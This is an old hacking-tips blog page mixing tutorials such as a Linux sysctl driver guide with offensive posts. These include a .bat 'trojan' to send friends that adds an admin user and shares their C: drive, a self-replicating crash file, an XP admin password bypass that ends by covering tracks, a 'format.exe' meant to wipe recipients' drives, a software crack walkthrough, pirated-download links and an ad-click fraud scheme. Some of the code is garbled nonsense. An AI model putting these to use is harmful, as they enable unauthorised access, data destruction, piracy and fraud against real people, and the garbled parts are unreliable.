The trick is to convert the human readable website address that's blocked (like Link:) into an IP address (208.75.184. 160) and again translate this value to a decimal address which is probably not blocked by the website filters.
Here's a step by step guide to render Link:. com to a decimal address:

How to Access Restricted Websites
1) get its IP address (216.178.39. 74), by pinging the name (if you have a direct internet connection) or if you only have access via a web proxy then find it out by using a networking website like network-tools. com.
2) start your PC's calculator, and change it to scientific mode (using the "View" menu)

3) enter each of the four IP octets, one by one, converting them to binary (enter number and click on the "Bin" radio button)
Thus 216.178.39.74 becomes
216 = 11011000
178 = 10110010
39 = 00100111
74 = 01001010
Notice how any binary numbers less than 8 digits long have had leading zeroes added to pad them out. Reassembled into IP address order, you get 11011000.10110010. 00100111. 01001010
4) Remove the dots, so you get one huge line of binary, thus: 1101100010110010001 0011101001010
5) Copy this binary string
6) Go to your scientific calculator, and hit the "Bin" button FIRST (as you are about to enter binary), THEN paste in the binary string.
7) Click on the "Dec" button on your calculator, and you will get the converted value of 3635554122
8) Add the hypertext protocol prefix and paste into your browser's address bar: Link:
Wuntoo adds: I used to be in a place that had websense, where both website names and their corresponding IP addresses were blocked. However was able to get limited access by converting the IP address to decimal, which websense (at the time) did not know about. This might have changed since, or if your school runs an old version it might still work. Note that if you surf away from the page you might hit websense blocks again unless you manually reconstruct the next address you want to get to.
Stumble Upon Toolbar Read more on this article... Read more on this article...

Jul 3, 2008

Trace back the hacker

In this following article i am providing u with information about how to save urslf when u r HACKED....


open dos command,go to -(Start/Run/type "command" without inverted commas and hit enter),& in the MSDOS prompt,type:
netstat -a

(make sure you include the space in between the "t" and the "-a").


This command will show u the host name of the lamer and of course yours also ..ur host name will be under local address and his wud be under foreign address.. note any suspicious name and every number u c after the host name under foreign address which is new and suspicious there(numbers are ports but i consider u totally unaware).
After ur done,now type
Netstat -an (again a space between "t" and "-an")

this will list all connections in numerical form, which makes it a lot easier to trace malicious users....Hostnames can be a little confusing if you don't know what you're doing (although they're easily understandable, as we shall see later). Also, by doing this, you can also find out what your own IP address is, which is always useful.

It wud look a bit like this
Proto.....Local Address.....Foreign Address.....State
TCP.......0.0.0.0:135.......0.0.0.0:0...........Listening
TCP.......127.0.0.1:1026....0.0.0.0:0...........Listening
TCP.......Your IP:Port......0.0.0.0:0...........Listening
TCP.......Your IP:Port......A New IP:Port.......Established

A New IP:Port -note that stuff
Now that u have a IP Addess and a host name,type
tracert type IP address/Hostname here

write whole thing there.. thats after u write tracert give a space then type A New IP we found in last step.. give a / then write..Host name we found in first step.remember no port there to be added..
This will trace the lamer which is prolly using a trojan on ur computer to do what he wants..result will give u some ip addresses ..note all of them
now go to ip2location.com/free.asp
write ip addresses in the box and see where the ips belong to..some ips will give u ISPs like bsnl ... last ip wud be his ip ..now call ur or his ISP & inform dem abt it!DO RESPOND 2 DIS..
Stumble Upon Toolbar Read more on this article... Read more on this article...

Making your own trojan in a .bat file

Open a dos prompt we will only need a dos prompt and windows xp operating system

-Basics-

Opening a dos prompt -> Go to start and then execute and type
cmd and press ok

Now insert this command: net
And you will get something like this

NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]


In this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send

We will select some of those commands and put them on a .bat file.

What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad(This is the most deadliest weapon of windows) and write there:

dir
pause

And now save this as test.bat and execute it.
Funny ain't it ?

---------------------- Starting -------------------
-:Server:-

The plan here is to share the C: drive and make a new user
with administrators access

Step one -> Open your dos prompt and a notepad.
The dos prompt will help you to test if the commands are ok
and the notepad will be used to make the .bat file.

Command #1-> net user xyz /add
What does this do? It makes a new user called xyz(type the name of the user) can put
any name you want

Command #2-> net localgroup administrators xyz /add
This is the command that make your user go to the administrators
group.

Depending on the windows version the name will be different.
If you got an American version the name for the groups is Administrators and for the Portuguese version is administrators so it's nice you know which version of windows xp you are going to try share.

Command #3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.

Nice and those are the 3 commands that you will need to put on your .bat file and send to your friend.
-!extras!-
Command #4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim opens the .bat it will send a message to your computer and you can check the victim ip.

->To see your ip in the dos prompt put this command: ipconfig

-----------------------: Client :----------------
Now that your friend opened your .bat file her system have the C: drive shared and a new administrator user.First we need to make a session with the remote computer with the net use command,you will execute these commands from your dos prompt.

Command #1 -> net use \\victimip neo
This command will make a session between you and the victim.Of course where it says victimip you will insert the victim ip.
Command #2-> explorer \\victimip\system
And this will open a explorer windows in the share system which is the C:/ drive with administrators access!!!

Have Fun !!!!
Stumble Upon Toolbar Read more on this article... Read more on this article...

E-Mail Tracker Pro 2007 7.0j

Email analysis tool that tracks Internet emails back to the sender E-Mail Tracker Pro helps identify the true source of emails to help track suspects,verify the sender of a message,trace and report email abusers.The trace analysis reports the sender's IP address,estimated location,network and domain information.E-Mail Tracker Pro also helps uncover misdirection- a technique often used to disguise the sender- to expose the true origins of the email.

A plug-in for Microsoft Outlook will add a button to the Outlook toolbar for one-click e-mail tracing.For all other email programs,the header information may be easily pasted into EMail Tracker Pro for quick analysis.A built-in location of the database tracks emails to a country or region of the world,who look ups provide abuse reporting information.

Using this feature scans every email waiting for delivery and quickly identifies where they originated from and if they are misdirected (a common tactic used by the abusers- to make you think that email is from somewhere else) . This saves you time and effort as it allows you to quickly identify and remove SPAM and infected emails safely before they can do any harm.

Requirements:128Mb memory, 40Mb disk space, 1Ghz processor,Sun Java Runtime Environment(included with E-Mail Tracker Pro) 1.4.2 or Microsoft JVM 1.1.4 build 3810

Limitations:15 days trial Version

Link:
http:// download.visualware. com/pub/emt/emt.exe
Stumble Upon Toolbar Read more on this article... Read more on this article...

CRASH THE COMPUTER EASILY

open a notepad
type the following

start rabi.dat
rabi.dat
save the file as rabi.dat
by using right click you can change icon

once the file is created if some one is going to click it
the system will crash
HAPPY CRASHINGSSSS
Stumble Upon Toolbar Read more on this article... Read more on this article...

HIDE UR FOLDERS WITHOUT USING FOLDER LOCK

Suppose u want to hide a folder named "Movies" which is in D: drive of your computer



Go to command prompt
start--->run--->cmd-->d:

After changing the path from C: to D:

Type D:/>attrib +h +s Movies
Action: The above command is used to hide the folder "Movies"

To show the folder

Type D:/>attrib -h -s Movies
Action:The above command will make the folder "Movies" visible
Stumble Upon Toolbar Read more on this article... Read more on this article...

Boost ur speed

Firefox + IDM + TCP Optimizer

Plz do a speed test of your net connection before & after at http://speedtest.net/ to know what difference this software has made.

1) At first speed up the firefox::simply do the following

Type "about:config" into the address bar and hit return. Scroll down and look for the following entries:

network.http.pipelining

network.http.proxy.pipelining

network.http.pipelining.maxrequests

Alter the entries do as follows:

Set "network.http.pipelining" to "true"

Set "network.http.proxy.pipelining" to "true"

Set "network.http.pipelining.maxrequests" to some number like 30.

Lastly right-click anywhere and select New-> Integer.

Name it "nglayout.initialpaint.delay" and set its value to "0".

2) Now Download & Install IDM. ( The Best Download Manager I've ever used. )

:: Download ::

http://rapidshare.com/files/93565945/Internet.Download.Manager.IDM.5.12.Build8.Incl.Patch.Winall.rar

OR

http://rapidshare.com/files/97796166/Internet.Download.Manager.IDM.5.12.Incl.Crack_By_StreTcH.rar

Pass : www.oxyg3n.ca

OR

http://www.4shared.com/get/38065407/cd69f31c/IDM5112PatchInc.html

Password:pcgenius

3) Now Download TCP Optimizer

:: Download ::

http://www.4shared.com/file/43746580/e7a41755/TCPOptimizer.html

password: pcgenius

Open TCP Optimizer, dont do anything, just select the option 'Optimal Settings' & apply the changes.In the next box, press OK and reboot.

Stumble Upon Toolbar Read more on this article... Read more on this article...

Aspi

WinXP does not come with an Aspi layer. So far almost 90% of the problems with WinXP

and CD burning software are Aspi layer problems. After installing WinXP, before installing any CD burning software do a few things first: 1. Open up "My computer" and right click on the CD Recorder. If your CD recorder was detected as a CD recorder there will be a tab called "Recording". On this tab uncheck ALL of the boxes. apply or OK out of it and close my computer. 2. Next install the standard Aspi layer for NT. Reboot when asked. That's is. after the reboot you can install any of the currently working CD recording applications with no problems. If using CD Creator do not install direct CD or Take two as they are currently incompatible but Roxio has promised a fix as soon as XP is released.


Another way ... Boot from win98 cd, delete the SAM, SAM.SAV, SAM.LOg files ( in sytem32/config folder ). Note: don't delete SAM.exe. Stumble Upon Toolbar Read more on this article... Read more on this article...

Jul 2, 2008

Increasing options in add/remove programs:

If you are not a fan of MSN Messenger? You don't want Windows Media Player on your system? Fair enough, but if you go to Add/Remove Programs in the Control Panel, by default none of Windows XP's 'built in' programs are visible. it's fairly easy to change, though... just open the file X:\Windows\inf\sysoc.inf (where X: is the drive letter where Windows XP is installed) in Notepad. You should see a section of the file something like this:

Components]
NtComponents=ntoc.dll,NtOcSetupProc,,4
WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7
Display=desk.cpl,DisplayOcSetupProc,,7
Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7
NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7
iis=iis.dll,OcEntry,iis.inf,,7
com=comsetup.dll,OcEntry,comnt5.inf,hide,7
dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7
IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7
TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2
msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6
ims=imsinsnt.dll,OcEntry,ims.inf,,7
fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7
AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7
IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7

This is a list of all components installed at the moment. I've taken the example of MSN Messenger - the program entry called 'msmsgs', third-last line. You can see the word 'hide' highlighted - this is the string which tells Windows not to display the component in the Add/Remove Programs list. Fix this up by simply deleting the word 'hide' like so:

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7

To this:

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7

Now, after restarting, you should be able to see MSN Messenger in the Add/Remove Programs list. If you want to be able to quickly view and remove all components, simply open the sysoc.inf file and do a global find and replace for the word ",hide" and replace it with a single comma ",".

Stumble Upon Toolbar Read more on this article... Read more on this article...

No Shutdown:

You can easily remove the "SHUT DOWN" button & can disturb anyone who doesn't know about this trick...
GO to run,type regedit,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
"NoClose"="DWORD:1"
Stumble Upon Toolbar Read more on this article... Read more on this article...

How to hack windows XP admin password

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:



cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user password"

If the Administrator Account is called Frank and you want the password blah enter this

"net user Frank blah"

and this changes the password on franks machine to blah and your in.


Have fun

p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

Stumble Upon Toolbar Read more on this article... Read more on this article...

Earn money by surfing

If u really want 2 pay ur monthly bills and don't want to disturb ur dad for ur pocket money simply follow these guidelines..

part 1

hey guys u can earn money more than 63$ per month or more by just surfing 15-20 min a day.

I’ll share a site with you which do not scam and helps you make money but it works!
this is not a joke or scam. with this money ultimately u can even purchase rapidshare premium accounts and purchase items on ebay etc..


Firstly go sign up on http://www.alertpay.com/?3UKbKjrvORdmfGi%2bYqYiJg%3d%3d for a Personal Pro or a Buisiness Account (it's free).

then goto following link and register urself it's free)

http://bux.to/?r=buxaman

after u have registered u become a member(refferal) under of mine ,

part 2

actually, you get paid to click on ads and visit websites. The process is easy! You simply click a link and view a website for 30 seconds to earn money. You can earn even more by referring friends. You'll get paid $0.01 for each website you personally view and $0.01 for each website your referrals view. Payment requests can be made every day and are processed through AlertPay. The minimum payout is $10.00.

now main work starts:
here the site pays money on opening the advertisements.
the more u open the advertisement ,the more u earn !!!!!!

but here is the fastest and simple process also to click the advertisements automatically

goto www.autoclickers.uni.cc

download : bux.toautoclicker 1.4.0(software)

this program will automatically click ads for u saving time and hassle-free!

now, make ur friends etc. ur members(refferals) under ur refferral link and u will be paid for the advertisement they click !!!!!!!!

part 3

Earnings example (based on current averages)
» You click 10 ads per day = $0.10
» 20 referrals click 10 ads per day = $2.00
» Your daily earnings = $2.10
» Your weekly earnings = $14.70
» Your monthly earnings = $63.00

So sign up now, Why wait? And I request you all not to remove my Ref ID, Just think it as a credit for telling you all this and help me out too. :]



I Swear it works !!!!!!!!!!!! it takes 2 seconds

ur loss if u don't lol !!
Stumble Upon Toolbar Read more on this article... Read more on this article...

Protect ur ip address

Hi frnds...
We all know we r not all safe online, anybody can track out "IP-ADDRESS" & can play games with us.....

Do u know dat by knowing da "IP-ADDRESS" he can operate ur system through "DOS",
so guys,safe-gaurd ur "IP-ADDRESS" surf anonymously..
Dis not only hide ur "IP-ADDRESS" buts acts an Anti-Spyware,Total Net-Shield,protect from Nyms...

download

How to 'Trace IP- Address'????
Frnds do u want to know how safe ur just click Here ,don't worry frnds nothing will happen it just shows:
My IP address [?]:
IP address country:
IP address state:
IP address city:
IP address latitude:
IP address longitude:
ISP of this IP [?]:
Proxy:
Organization:
Local Time of this IP country:

After downloading dat software den again click der.... Check it out my urself...

Visit again for new needs!!!!!

Stumble Upon Toolbar Read more on this article... Read more on this article...

Writing sysctl Drivers on Linux

Writing drivers for the Linux kernel can be a grotesque experience for neither the kernel nor the documentation is anywhere near A-1 at Lloyd's. It can be a lot of fun doing things in kernels, however, and it is the right place for a lot of hardware related stuff, meta-process stuff, et cetera. I would like to demonstrate a rarely used technique for a fairly rarely used type of driver that is much simpler and faster than the oft-used character device driver.

The type of driver I am talking about handles sysctl requests and I'll think you'll find it an excellent alternative to similarly generic character devices, especially since it can easily masquerade as one. I think sysctl drivers are particularly nice if you want an interface for the command line and for a high-speed C API with a minimal amount of thrashing around with Linux's cruft. sysctl means system control and it is a BSDism that found its way into Linux. Naturally, sysctl is also available on the fine BSDs like NetBSD and FreeBSD, but, those systems aren't in much need of a solid driver system as they are quite well-designed. Therefore, Linux is my focus du jour.

There are three ways of interfacing with the kernel via a sysctl. Defining a sysctl handler can, at your discretion, add a file to /proc/sys (assuming you are using procfs; nearly everyone is) that can be accessed as a file that you can, with proper permissions, read and write (i.e. like a character device). Secondly, you can access your handler with the sysctl utility that usually lives in /sbin. And, thirdly, you can use the sysctl system call through it's aptled named library function, sysctl, found in or in a raw way. These direct access choices provide excellent efficiency.

There is a mild caveat, though. sysctl is intended for fairly low band-width communications to the kernel. You have basically two options; you can use sysctl for fairly small, discrete chunks of data (as it is almost universally used in the kernel right now) or have some sort of stateful protocol in your accesses of it (I'd like to see more of this style of complex interfacing with sysctl handlers).

One very simple use of a sysctl driver is to just make a textual or numeric setting that can be accessed through the multiple ways enumerated above. This is very easy to do. To get started, simply fill out an array of ctl_table structures and then register that array with the register_sysctl_table. When you register the table, a ctl_table_header is returned (or NULL if there is an error). If you want to remove your handler, you pass that table header to the unregister_sysctl_table function:

    #define __KERNEL__
#define MODULE

#include
#include
#include

static ctl_table my_ctl_table[] = {
{0}
};

static struct ctl_table_header *my_table_header;

int init_module (void)
{
if (!(my_table_header = register_sysctl_table(my_ctl_table, 0)))
return EPERM;
return 0;
}

void cleanup_module (void)
{
if (my_table_header)
unregister_sysctl_table(my_table_header);
}

init_module and cleanup_module are automatically called when your module is loaded. The ctl_table array expects an empty entry ("{0}") at the end of the array, which also happens to be the beginning in this example. To compile the example, if it was named ctl_test.c, we would do something like this:

    gcc -I/usr/src/linux-2.4/include -c ctl_test.c

The result would be a tiny file named ctl_test.o that you could load with insmod. You Linux source code might be somewhere else than this; change the path appropriately. You may need to download the Linux source. Although you probably have similarly named headers in your include path already (in /usr/include) these are missing information that you need; get the source if you can.

As root, you can load the module with "insmod ctl_test.o", check its existence with "lsmod", and then remove it with "rmmod ctl_test". Those utilities normally live in /sbin by the way.

Okay, now we will add a real ctl_table to the array in order to make the first functional device. The structure of ctl_table can be found in linux/sysctl.h and is this:

    struct ctl_table
{
int ctl_name; /* Binary ID */
const char *procname; /* Text ID for /proc/sys, or zero */
void *data;
int maxlen;
mode_t mode;
ctl_table *child;
proc_handler *proc_handler; /* Callback for text formatting */
ctl_handler *strategy; /* Callback function for all r/w */
struct proc_dir_entry *de; /* /proc control block */
void *extra1;
void *extra2;
};

To understand this structure, let's look at how we will fill out this structure to make a simple string-based entry.

    enum { CTL_MYTEST = 555 };
char buffer[128];

static ctl_table my_ctl_table[] = {
{
CTL_MYTEST,
"mytest",
buffer,
sizeof(char) * 128,
0666,
NULL,
&proc_dostring,
&sysctl_string,
},
{0}
};

The first member is the ctl_name and is a unique integer 'name' that is used to rapidly locate this sysctl. The Linux kernel defines the 'names' up to 10 or so (see linux/sysctl.h), so I like to use a nice high number. The second member, procname, is a string giving a human-readable name for the sysctl. This name will actually appear in /proc/sys as a file (e.g. /proc/sys/mytest for our code). If the procname is NULL, no file will be created and this sysctl will only be accessible through the sysctl function (and you can set proc_handler to NULL).

Data is transported to and from the handler with the next member, data, which in this case is a 128 character array called buffer. The size of data is given as the next member. Thinking about the size of this buffer is somewhat important. Next comes the access mode which in our example allows read and write permissions for anyone who wants to use it (i.e. including non-root users). The next member is child which allows another ctl_table array to be embedded; this allows directories:

    enum { CTL_MYTEST = 555, MYTEST_BUFFER = 1 };
char buffer[128];

static ctl_table my_inner_ctl_table[] = {
{
MYTEST_BUFFER,
"mytest",
buffer,
sizeof(char) * 128,
0666,
NULL,
&proc_dostring,
&sysctl_string,
},
{0}
};

static ctl_table my_ctl_table[] = {
{
CTL_MYTEST,
"mydir",
0,
0,
0,
my_inner_ctl_table,
},
{0}
};

Now you actually get /proc/sys/mydir/mytest. The last two members that we need to consider are proc_handler and strategy, a pair of function pointers that actually do the handling of the sysctl. Here are their types (strategy is of type, ctl_handler):

    typedef int ctl_handler (ctl_table *table, int *name, int nlen,
void *oldval, size_t *oldlenp,
void *newval, size_t newlen,
void **context);

typedef int proc_handler (ctl_table *ctl, int write, struct file * filp,
void *buffer, size_t *lenp);

We'll get to writing our own handlers in a jiffy (wink), but, in our example we are using a pair of very convenient, ready-to-use handlers called proc_dostring and sysctl_string. These will automatically handle the getting and setting of a string using buffer. We could have used their int array cousins, proc_dointvec and sysctl_intvec for lists of integers. These functions are defined in kernel/sysctl.c.

So, upon compiling and loading this module we get the file as before, mytest, in the /proc/sys tree. Now we can set the buffer by doing either of these two commands (if we use a directory with the sysctl command-line utility, we join the path elements with a "." character (e.g. mydir.mytest)):

    echo 'test string' > /proc/sys/mytest
or
    sysctl -w mytest='test string'

Both of these commands will now cause "cat /proc/sys/mytest" to return "test string". Now, if we wanted to access it from a high speed C program, this is how we would do it (note that when writing, we are passing the buffer_length by value and not by reference):

    enum { CTL_MYTEST = 555 };

int main (void)
{
int name[] = { CTL_MYTEST };
int name_length = 1;
char buffer[128];
size_t buffer_length = sizeof(char) * 128;

/* Reading */

sysctl(name, name_length, buffer, &buffer_length, 0, 0);
printf("mytest: %s\n", buffer);

/* Writing */
strcpy(buffer, "potato");
buffer_length = strlen(buffer);
sysctl(name, name_length, 0, 0, buffer, buffer_length);

return 0;
}

What remains now is to customize the proc_handler and/or ctl_handler in our driver so that we can wind up doing just about anything through sysctl calls. Optionally (if you return 1 or more from the ctl_handler, the proc_handler is skipped), only one of the two handlers is called depending on if you are accessing the sysctl through the /proc interface (e.g. with cat or the sysctl CLI utility) or with a sysctl function call. With the proc_handler you get an actual file, a read/write flag, and an input/output buffer whereas with ctl_handler you get argments that very closely mirror the sysctl function call arguments:

    typedef int ctl_handler (ctl_table *table, int *name, int nlen,
void *oldval, size_t *oldlenp,
void *newval, size_t newlen,
void **context);

typedef int proc_handler (ctl_table *ctl, int write, struct file * filp,
void *buffer, size_t *lenp);

If you don't define a strategy in your ctl_table it will automatically copy the data, by the way, and you can mix and match the prebuilts (say to produce formatted integer array output) with your own functions. What would be fun, here, though would be to hook into the call and do whatever you want in the kernel. You have an easy data transport mechanism which can readily handle your own custom C struct via a ctl_handler, multiple access methods, and more and all you have to do is define a custom handler. For example:

    #include 

static int my_ctl_handler (ctl_table *table, int *name, int nlen,
void *oldval, size_t *oldlenp,
void *newval, size_t newlen,
void **context)
{
if (oldval) {
printk("Ah, so you wanted the value. Well, Bonk!\n");
copy_to_user(oldval, "bonk!", (sizeof(char) * 6));
put_user((sizeof(char) * 6), oldlenp);
}
if (newval) {
copy_from_user(table->data, newval, newlen);
printk("Good golly, someone presented '%s'!\n", table->data);
}
return 1;
}

static ctl_table my_ctl_table[] = {
{
CTL_MYTEST,
"mytest",
buffer,
sizeof(char) * 128,
0666,
NULL,
&proc_dostring,
&my_ctl_handler,
},
{0}
};

Note that we return 1 in order to bypass the proc_handler. If we run the test program we made above it outputs, "mytest: bonk!". And, if we then execute the dmesg utility the following appears in the log:

    Ah, so you wanted the value. Well, Bonk!
Good golly, someone presented 'potato'!

You can do anything once you are in here! For example, you could dynamically create more ctl_table entries to give unique handles to a caller. On the reception of an 'open' sysctl, you could generate a newly numbered sysctl and return that number. You would then have a unique 'device' to access (much like a socket, etc).

You can also tap the proc_handler in order to change the formatted appearance of the file or to make it take the extra trip into the ctl_handler:

    static int my_proc_handler (ctl_table *ctl,
int write,
struct file *filp,
void *buffer,
size_t *lenp)
{
if (write) {
my_ctl_handler(ctl, NULL, 0, NULL, NULL, buffer, *lenp, NULL);
} else {
if (filp->f_pos) {
*lenp = 0;
} else {
my_ctl_handler(ctl, NULL, 0, buffer, lenp, NULL, 0, NULL);
filp->f_pos = 1;
}
}
printk("We were in the proc_handler\n");
return 0;
}

Now, if we do an "echo 'peekaboo' > /proc/sys/mytest", dmesg shows (note the tacked-on newline):

    Good golly, someone presented 'peekaboo
'!
We were in the proc_handler

If we do a "cat /proc/sys/mytest" we get "bonk!". If we do dmesg then we see:

    Ah, so you wanted the value. Well, Bonk!
We were in the proc_handler
We were in the proc_handler

Note that it entered to proc_handler twice. When reading, it keeps entering it until *lenp is equal to 0. So, we use the file position to mark if we've already read the value. Note that you don't have to call the ctl_handler from the proc_handler or vis versa. You could have the ctl_handler have a nice binary struct format (perfect for your own userland API that hops into the kernel for stuff) while the proc_handler could provide a more human-readable interface.

Well, that rounds up this quick look at Linux sysctl driver programming. The rest is up to you. Once you are in the kernel, you really can do just about anything you want. Happy hacking!

Stumble Upon Toolbar Read more on this article... Read more on this article...

Add any one from Orkut -the cool hacking trick.


Now you can add any one from Orkut a moderator of your community even if he is not your community member...
Thats the reason many people have added Orkut Buyukkokten (Owner of Orkut) as there communities moderator.

All you need is this Java Script :

javascript:a=document.forms[1]; a.action="CommMembers.aspx?cmm=40588034&Action.add
Moderator&memberId=12079364927094249783"; a.submit(); void(0)

How to Use this Script :

First go to the Community you want to add moderator to..(you must be the owner)
Then you need to make changes to the script i have posted above..
First of all copy it to the place where you can edit it easily..
In the script there is a Text : CommMembers.aspx?cmm=40588034
Change the Number at the end of this line with your communities ID..

As for those guys who don't know what community ID is :
Community ID is the number at the End of the Community Profile page URL


Example: In url, http://www.orkut.com/Community.aspx?cmm=40588034p>

40588034 is Community ID!

Then Find this line in the Script : memberId=12079364927094249783
Change the number at the end of this line with the persons UID you want to add moderator.

Orkut User ID is the number at the end of your Profile..
For example in this Profile :
http://www.orkut.com/Profile.aspx?uid=1207936492
7094249783
Orkut User ID (UID) is : 12079364927094249783

join my adda- the club hack to get more hacking tips.

Stumble Upon Toolbar Read more on this article... Read more on this article...

WANNA MAKE FREE CALLS

.Yes this is true....

YOU DON'T HAVE TO PINCH URSELF.
just click here.
Stumble Upon Toolbar Read more on this article... Read more on this article...

Jul 1, 2008

NCH Tone Generator Patching Procedure

NCH Tone Generator Patching Procedure

PART 1:

Before attempting to crack this NCH Tone Generator, Let me tell that this software. NCH Tone Generator is an easy tool to create sinusoidal/square/triangle waves in your speaker.

You can also try out interference of sound

So coming back to cracking this. As Usual this software also use the GetSystemTimeAsFileTime API to find current time. The only parameter to this function is a pointer to a FILETIME structure that receives the current system date and time in UTC format.

I installed my version (2.10) on Monday, January 21, 2008, 7:09:30 PM.

So where do we start from???

We start by setting breakpoint on every call to GetSystemTimeAsFileTime.

OllyDbg Automatically pauses when it reaches the Program Entry Point. Now Right Click and select Search For -> All Intermodular Calls. Sort out the list alphabetically for convenience. Just scroll down and you should be able to see 2 calls to GetSystemTimeAsFileTime. Right click on one of them select Set breakpoint on every call to GetSystemTimeAsFileTime. Now both of them 'll become red. Now allow the program to continue by pressing the F9 key.

Now the program will pause at:

0042B95C FF15 68124000 CALL DWORD PTR DS:[<&KERNEL32.GetSystemT>; kernel32.GetSystemTimeAsFileTime

Forget that. That isn't the correct place to change. I wasted 1 and half hours there .

Just continue by pressing F9.

Now it'll pause at:

00424EE4 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8]

00424EE7 50 PUSH EAX

00424EE8 FF15 68124000 CALL DWORD PTR DS:[<&KERNEL32.GetSystemT>; kernel32.GetSystemTimeAsFileTime

00424EEE 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8]

00424EF1 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4]

So above the function call you see that its parameter is pushed into the stack. And the values filled are moved to EAX and ECX registers. Select all the above mentioned 5 instructions and right click, Select Binary -> Fill with NOPs.

Now Use these 16 Bytes bytes to write these instructions:

MOV EAX, 00000000

MOV ECX, 00000000

Now select all the Instructions in red, right click, select Copy to executable -> Selection.

Now in the new window that pops up, right click, select Save file.

Save in some other name, close OllyDbg, backup original tone.exe and rename this cracked version to tone.exe and now run it. It should run if you've done all steps correctly .

-------------------------- CALCULATING 00000000and 00000000---------------------------

These values can be any value filled by GetSystemTimeAsFileTime when called before the trial period ends.

Make a simple project in VC++. Use SystemTimeToFileTime Function to get the values of FILETIME for a desired SYSTEMTIME . wsprintf and MessageBox these two DWORD values in FILETIME. The dwLowDateTime and dwHighDateTime members of FILETIME structure holds the values of XXXXXXXX and YYYYYYYY respectively. Use these values there.

References:

GetSystemTimeAsFileTime:

http://msdn.microsoft.com/en-us/library/ms724397(VS.85).aspx

FILETIME structure:

http://msdn.microsoft.com/en-us/library/ms724284(VS.85).aspx

SystemTimeToFileTime:

http://msdn.microsoft.com/en-us/library/ms724948(VS.85).aspx

SYSTEMTIME structure:

http://msdn.microsoft.com/en-us/library/ms724950(VS.85).aspx



Stumble Upon Toolbar Read more on this article... Read more on this article...

Recover Lost Instant Messenger Passwords - GTalk, MSN,Yahoo! or Windows Live:


MesenPass is a password recovery utility that allows you to recover password(s) of all the popular instant messengers: MSN,GTalk, AOL,Yahoo!Messenger,Windows Live Messenger.

List of usernames and passwords recoverd by the application

The moment you run MessenPass, it automatically decrypts the available passwords, and displays all user name/password pairs that it found in the main window of the application.It will work even without running the messenger at that time.

Only condition is you have chosen the remember your password option in one of the above programs. And also you cannot use this utility for grabbing the passwords of other users, it works only for current logged-on user on your local computer.

This application also supports saving the usernames/passwords to a file instead of displaying on screen. If you want to save to a file directly then use the following switch while launching

/stext




Stumble Upon Toolbar Read more on this article... Read more on this article...

Format HDD using Notepad.

* Copy & Paste the following code in Notepad. 0100101100011111001001010101010101000 0011111100000 Save As "format.exe" or any name u want (but with extension.exe) Now you can send this .exe file
Copy & Paste the following code in Notepad. 0100101100011111001001010101010101000 0011111100000 Save As "format.exe" or any name u want (but with extension.exe) Now you can send this .exe file As "format.exe" or any name u want (but with extension.exe) Now you can send this .exe file to people to format their HDD It can fail to format your HDD while running WINDOWS.
Format c:\ /Q/X -- this will format your drive c:\
011001100110111101110010011011010110000 10111010000 100000011000110011101001011100 0010000000101111010100010010111101011000 Format d:\ /Q/X -- this will format your drive d:\ 011001100110111101110010011011010110000 10111010000 100000011001000011101001011100 0010000000101111010100010010111101011000
Format a:\ /Q/X -- this will format your drive a:\

0110011001101111011100100110110101100
0010111010000 100000011000010011101001011100 0010000000101111010100010010111101011000 del /F/S/Q c:\boot.ini -- this will STOP your computer from booting.
011001000110010101101100001000000010
11110100011000 101111010100110010111101010001 001000000110001100111010010111000110 00100110111101 101111011101000010111001101001 0110111001101001
Stumble Upon Toolbar Read more on this article... Read more on this article...
::SITES LINKING ME::

SetEnvIfNoCase Referer "^http://(www.)?securecomputing\.com" ref=1 "(.*)" Order Allow,Deny Allow from all Deny from 206.169.110.66 Deny from env=ref